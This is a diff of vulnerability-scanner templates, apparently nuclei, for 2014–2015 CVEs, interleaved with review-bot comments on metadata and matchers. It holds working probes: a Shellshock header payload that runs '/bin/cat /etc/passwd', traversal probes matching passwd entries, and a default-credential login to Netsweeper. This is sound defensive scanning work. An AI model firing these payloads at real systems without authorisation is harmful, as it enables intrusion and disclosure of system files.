http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 + classification: + cve-id: CVE-2014-5258 tags: cve,cve2014,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-5368.yaml b/cves/2014/CVE-2014-5368.yaml index bf03c5374a..2856a69401 100644 --- a/cves/2014/CVE-2014-5368.yaml +++ b/cves/2014/CVE-2014-5368.yaml 
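Review bot: The rewritten CVE-2014-5258 description says `allows remote authenticated users to read arbitrary files`, yet nothing in the template supplies a session: the request is a plain `method: GET` (its path lies outside this hunk) with no `Cookie` or login step visible. Either `showTempFile.php` is reachable pre-auth and the description should say `remote attackers`, or the template needs authentication and should say so in `description`/`name`, since an unauthenticated probe against an auth-gated endpoint would simply never match and the `root:.*:0:0:` regex would report nothing. Worth confirming against the exploit-db and packetstorm references added in the same hunk.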
@@ -4,10 +4,14 @@ info: name: WordPress Plugin WP Content Source Control - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 - https://www.exploit-db.com/exploits/39287 - https://www.cvedetails.com/cve/CVE-2014-5368 + - http://seclists.org/oss-sec/2014/q3/417 + classification: + cve-id: CVE-2014-5368 tags: cve,cve2014,wordpress,wp-plugin,lfi requests: @@ -27,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 6c5db06412..66122b3290 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml 
@@ -1,44 +1,49 @@ -id: CVE-2014-6271 - -info: - name: Shellshock - author: pentest_swissky - severity: critical - description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications - reference: - - http://www.kb.cert.org/vuls/id/252743 - - http://www.us-cert.gov/ncas/alerts/TA14-268A - tags: cve,cve2014,rce - +id: CVE-2014-6271 + +info: + name: ShellShock - Remote Code Execution + author: pentest_swissky,0xelkomy + severity: critical + description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. 
+ reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 + - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 + - http://www.kb.cert.org/vuls/id/252743 + - http://www.us-cert.gov/ncas/alerts/TA14-268A classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-6271 cwe-id: CWE-78 -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/cgi-bin/status" - - "{{BaseURL}}/cgi-bin/stats" - - "{{BaseURL}}/cgi-bin/test" - - "{{BaseURL}}/cgi-bin/status/status.cgi" - - "{{BaseURL}}/test.cgi" - - "{{BaseURL}}/debug.cgi" - - "{{BaseURL}}/cgi-bin/test-cgi" - headers: - Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" - part: body + tags: cve,cve2014,rce,shellshock + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/cgi-bin/status" + - "{{BaseURL}}/cgi-bin/stats" + - "{{BaseURL}}/cgi-bin/test" + - "{{BaseURL}}/cgi-bin/status/status.cgi" + - "{{BaseURL}}/test.cgi" + - "{{BaseURL}}/debug.cgi" + - "{{BaseURL}}/cgi-bin/test-cgi" + + headers: + Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index 7b52384af9..f71050692f 100644 
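Review bot: Every line of this file is removed and re-added with identical text, which looks like a line-ending normalization rather than a content change; that buries the real edits (new description, references and tags, `cvss-score: 9.8`, `part: body` moved above `regex:`) in a hunk that replaces the whole file, and a `.gitattributes` rule such as `*.yaml text eol=lf` would keep this from recurring — inferred from the shape of the diff, not stated on the page. On the template itself, the payload is injected only through the `Shellshock`, `Referer` and `Cookie` headers; given the description's own mention of mod_cgi, under which request headers become `HTTP_*` environment variables, adding the same value under `User-Agent` would cover the vector most public write-ups exercise at no extra cost. The new `description:` line also ends with trailing whitespace, which yamllint flags.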
--- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -4,9 +4,15 @@ info: name: Osclass Security Advisory 3.4.1 - Local File Inclusion author: daffainfo severity: high - reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html + description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. + reference: + - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html + - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 + - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 + - https://www.netsparker.com/lfi-vulnerability-in-osclass/ + classification: + cve-id: CVE-2014-6308 tags: cve,cve2014,lfi - description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." requests: - method: GET @@ -18,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml index 54f4490459..79f240dc79 100644 --- a/cves/2014/CVE-2014-8682.yaml +++ b/cves/2014/CVE-2014-8682.yaml 
@@ -1,22 +1,25 @@ id: CVE-2014-8682 info: - name: Gogs - 'users'/'repos' '?q' SQL Injection - author: dhiyaneshDK + name: Gogs (Go Git Service) - SQL Injection + author: dhiyaneshDK,daffainfo severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. reference: - - http://www.securityfocus.com/bid/71187 + - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 - http://seclists.org/fulldisclosure/2014/Nov/33 - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html - - http://gogs.io/docs/intro/change_log.html - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d - - http://www.exploit-db.com/exploits/35238 + - https://www.exploit-db.com/exploits/35238 - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 - - http://www.securityfocus.com/archive/1/533995/100/0/threaded - tags: cve,cve2014,sqli,gogs + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2014-8682 + cwe-id: CWE-89 metadata: - shodan-query: 'title:"Sign In - Gogs"' + shodan-query: title:"Sign In - Gogs" + tags: cve,cve2014,sqli,gogs requests: - method: GET @@ -26,11 +29,15 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '"ok":true' - '"data"' + - '"repolink":"' condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml index 2fff64b065..b462c7325c 100644 --- a/cves/2014/CVE-2014-8799.yaml +++ b/cves/2014/CVE-2014-8799.yaml 
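Review bot: The added matcher word `"repolink":"` (with `"ok":true` and `"data"` under `condition: and`) only proves that the search API answered with a repository list, which a patched Gogs does for any benign `q`; unless the query payload (outside this hunk) is built so that only a vulnerable instance returns rows, this set fingerprints the endpoint rather than the injection, and a negative-control request or a word that can appear only when the injected query succeeds would make the match meaningful. Separately, `shodan-query` lost its quotes: `title:"Sign In - Gogs"` still parses as a plain scalar, but the original `'title:"Sign In - Gogs"'` is the safer form given the embedded colon and double quotes. The `cvss-score: 10` agrees with the vector's S:C/C:H/I:H/A:H, so that part checks out.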
@@ -4,10 +4,14 @@ info: name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 - https://www.cvedetails.com/cve/CVE-2014-8799 + - https://wordpress.org/plugins/dukapress/changelog/ + classification: + cve-id: CVE-2014-8799 tags: cve,cve2014,wordpress,wp-plugin,lfi requests: @@ -29,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 8e73d7da9b..57224692e1 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml 
@@ -1,11 +1,17 @@ id: CVE-2014-9094 info: - name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting author: daffainfo severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + - http://websecurity.com.ua/7152/ + - http://seclists.org/fulldisclosure/2014/Jul/65 + - http://www.securityfocus.com/bid/68525 + classification: + cve-id: CVE-2014-9094 tags: cve,cve2014,wordpress,xss,wp-plugin requests: @@ -27,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9444.yaml b/cves/2014/CVE-2014-9444.yaml index a80d56cc8a..4a440d1e5c 100644 --- a/cves/2014/CVE-2014-9444.yaml +++ b/cves/2014/CVE-2014-9444.yaml 
@@ -1,13 +1,17 @@ id: CVE-2014-9444 info: - name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS) + name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting author: daffainfo severity: medium - description: The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability. + description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. reference: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 + - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html + - http://www.securityfocus.com/bid/71808 + classification: + cve-id: CVE-2014-9444 tags: cve,cve2014,wordpress,wp-plugin,xss requests: @@ -30,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9606.yaml b/cves/2014/CVE-2014-9606.yaml index 8bf7e31561..6c7ff99c8e 100644 --- a/cves/2014/CVE-2014-9606.yaml +++ b/cves/2014/CVE-2014-9606.yaml 
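Review bot: The rewritten description says the plugin `prior to v.0.9.2` is affected, but the `name` says `<= 0.9.2` and the packetstorm reference added in the same hunk is titled `WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting`, i.e. 0.9.2 itself; the three should agree, most likely `description: The Frontend Uploader WordPress plugin through 0.9.2 is affected by an unauthenticated reflected cross-site scripting vulnerability.` — confirm the fixed version against the wpscan entry. The description also still omits the vulnerable script and parameter, which the sibling templates in this commit spell out. The request and matchers are outside this hunk.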
@@ -1,16 +1,17 @@ id: CVE-2014-9606 info: - name: Netsweeper 4.0.8 - Cross Site Scripting Injection + name: Netsweeper 4.0.8 - Cross-Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9607.yaml b/cves/2014/CVE-2014-9607.yaml index 05eab3a640..cdbdffe670 100644 --- a/cves/2014/CVE-2014-9607.yaml +++ b/cves/2014/CVE-2014-9607.yaml 
@@ -1,16 +1,17 @@ id: CVE-2014-9607 info: - name: Netsweeper 4.0.4 - Cross Site Scripting Injection + name: Netsweeper 4.0.4 - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. + description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9607 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9607 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9608.yaml b/cves/2014/CVE-2014-9608.yaml index a79a21d6e2..ecb6d6688a 100644 --- a/cves/2014/CVE-2014-9608.yaml +++ b/cves/2014/CVE-2014-9608.yaml 
@@ -1,16 +1,17 @@ id: CVE-2014-9608 info: - name: Netsweeper 4.0.3 - Cross Site Scripting Injection + name: Netsweeper 4.0.3 - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9608 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9609.yaml b/cves/2014/CVE-2014-9609.yaml index 20cf466ef3..8edbc6409a 100644 --- a/cves/2014/CVE-2014-9609.yaml +++ b/cves/2014/CVE-2014-9609.yaml 
@@ -4,13 +4,14 @@ info: name: Netsweeper 4.0.8 - Directory Traversal author: daffainfo severity: medium - description: Directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 tags: cve,cve2014,netsweeper,lfi @@ -24,8 +25,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9614.yaml b/cves/2014/CVE-2014-9614.yaml index 6b8daf5b05..b71a33cd9c 100644 --- a/cves/2014/CVE-2014-9614.yaml +++ b/cves/2014/CVE-2014-9614.yaml 
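Review bot: The tightened passwd matcher `- "root:.*:0:0:"` in the second hunk of CVE-2014-9609 is applied the same way in the hunks for CVE-2015-1000012, CVE-2015-2067, CVE-2015-3337, CVE-2015-4414, CVE-2015-4632 and CVE-2015-5688, and in the new CVE-2015-2166 file, while the new CVE-2015-3897 file uses `- "root:[x*]:0:0:"`. These are two different contracts, not a cosmetic difference: `.*` also accepts passwd lines carrying an inline hash, whereas `[x*]` only accepts shadowed or locked entries. One form should be chosen repo-wide so false-positive and false-negative behaviour is predictable, and a short comment above the matcher stating which passwd layouts it is meant to accept would help future edits.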
@@ -4,13 +4,14 @@ info: name: Netsweeper 4.0.5 - Default Weak Account author: daffainfo severity: critical - description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 tags: cve,cve2021,netsweeper,default-login @@ -21,8 +22,8 @@ requests: POST /webadmin/auth/verification.php HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}}/webadmin/start/ + login=branding&password=branding&Submit=Login matchers-condition: and @@ -42,3 +43,5 @@ requests: part: header words: - 'Set-Cookie: webadminU=' + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9615.yaml b/cves/2014/CVE-2014-9615.yaml index 1f9852ee16..e79a758026 100644 --- a/cves/2014/CVE-2014-9615.yaml +++ b/cves/2014/CVE-2014-9615.yaml 
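Review bot: The `tags:` context line at the end of the first hunk still reads `tags: cve,cve2021,netsweeper,default-login` for a 2014 identifier, so this template is filtered into the wrong year bucket; since the commit already rewrites the surrounding info block, it should also change it to `tags: cve,cve2014,netsweeper,default-login`. In the second hunk the added line after `Referer:` appears to be an empty line, which would be the header/body separator the raw POST was missing; if so, that is a behaviour fix worth naming in the commit message rather than leaving implicit.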
@@ -1,16 +1,17 @@ id: CVE-2014-9615 info: - name: Netsweeper 4.0.4 - Cross Site Scripting Injection + name: Netsweeper 4.0.4 - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. + description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9615 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9615 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9617.yaml b/cves/2014/CVE-2014-9617.yaml index eae4068902..27037cadac 100644 --- a/cves/2014/CVE-2014-9617.yaml +++ b/cves/2014/CVE-2014-9617.yaml 
@@ -4,13 +4,14 @@ info: name: Netsweeper 3.0.6 - Open Redirection author: daffainfo severity: medium - description: Netsweeper version 3.0.6 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. + description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9617 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9617 cwe-id: CWE-601 tags: cve,cve2014,netsweeper,redirect @@ -25,3 +26,5 @@ requests: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9618.yaml b/cves/2014/CVE-2014-9618.yaml index 0fc0c1d536..189837b5af 100644 --- a/cves/2014/CVE-2014-9618.yaml +++ b/cves/2014/CVE-2014-9618.yaml 
@@ -1,16 +1,19 @@ id: CVE-2014-9618 info: - name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation) + name: Netsweeper - Authentication Bypass author: daffainfo severity: critical - description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. + description: | + The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 + - https://www.exploit-db.com/exploits/37933/ + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 tags: cve,cve2014,netsweeper,auth-bypass @@ -33,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml new file mode 100644 index 0000000000..80943c3214 --- /dev/null +++ b/cves/2015/CVE-2015-0554.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2015-0554 + +info: + name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure + author: daffainfo + severity: high + description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + reference: + - https://www.exploit-db.com/exploits/35721 + - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 + - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html + - http://www.exploit-db.com/exploits/35721 + classification: + cve-id: CVE-2015-0554 + tags: cve,cve2015,pirelli,router,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/wlsecurity.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var wpapskkey" + - "var WscDevPin" + - "var sessionkey" + condition: and + + - type: status + status: + - 200 diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index 52ad59227d..5b40f010c9 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml 
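Review bot: The `reference:` list of the new CVE-2015-0554 file carries the same exploit-db entry twice, once as `https://www.exploit-db.com/exploits/35721` and once as `http://www.exploit-db.com/exploits/35721`; one of them should be dropped. The same duplicate-with-a-twist pattern appears in the hunks for CVE-2015-4050 (`http://` and `https://` copies of the symfony blog post), CVE-2015-4414 (`.../exploits/37274` and `.../exploits/37274/`) and CVE-2015-4632 (`.../exploits/37388` and `.../exploits/37388/`). Also, unlike the neighbouring Netsweeper templates, `classification:` here holds only `cve-id`; adding the `cvss-metrics`, `cvss-score` and `cwe-id` fields from the NVD record would keep the metadata shape consistent.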
@@ -4,15 +4,17 @@ info: name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) author: daffainfo severity: high + description: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + - http://www.vapidlabs.com/advisory.php?v=154 + - http://www.securityfocus.com/bid/94495 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-1000012 cwe-id: CWE-200 - description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" tags: cve,cve2015,wordpress,wp-plugin,lfi requests: @@ -24,7 +26,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index 79427e3ba5..b77948b2a0 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml 
